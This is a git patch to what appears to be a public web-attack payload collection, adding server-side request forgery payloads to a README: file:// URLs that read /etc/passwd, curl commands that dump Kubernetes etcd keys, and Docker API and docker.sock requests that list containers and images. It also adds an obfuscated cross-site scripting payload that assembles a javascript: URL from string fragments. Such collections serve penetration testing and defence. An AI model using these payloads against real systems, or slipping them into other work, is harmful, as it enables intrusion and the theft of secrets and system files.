From cfbe1a446924b5e44823a5efe0a7fe025ae35767 Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Sun, 19 Aug 2018 16:32:26 +0200
Subject: [PATCH] SSRF Docker & Kubernetes

---
 SSRF injection/README.md | 28 ++++++++++++++++++++++++++++
 XSS injection/README.md  |  1 +
 2 files changed, 29 insertions(+)

diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index 5850d06..cbd1f2d 100644
--- a/SSRF injection/README.md	
+++ b/SSRF injection/README.md	
@@ -153,6 +153,13 @@ List:
 
 ## SSRF via URL Scheme
 
+File Wrapper
+
+```powershell
+file:///etc/passwd
+file://\/\/etc/passwd
+```
+
 Dict Wrapper
 The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
 
@@ -396,6 +403,27 @@ http://100.100.100.200/latest/meta-data/instance-id
 http://100.100.100.200/latest/meta-data/image-id
 ```
 
+### SSRF URL for Kubernetes ETCD
+
+Can contain API keys and internal ip and ports
+
+```powershell
+curl -L http://127.0.0.1:2379/version
+curl http://127.0.0.1:2379/v2/keys/?recursive=true
+```
+
+### SSRF URL for Docker
+
+```powershell
+http://127.0.0.1:2375/v1.24/containers/json
+
+Simple example
+docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
+bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
+bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
+```
+
+
 ## Thanks to
 
 * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 7071b08..348dab8 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -682,6 +682,7 @@ Bypass using weird encoding or native interpretation to hide the payload (alert(
 Exotic payloads
 
 ```javascript
+<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
 <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
 <script>$=1,alert($)</script>
 <script ~~~>confirm(1)</script ~~~>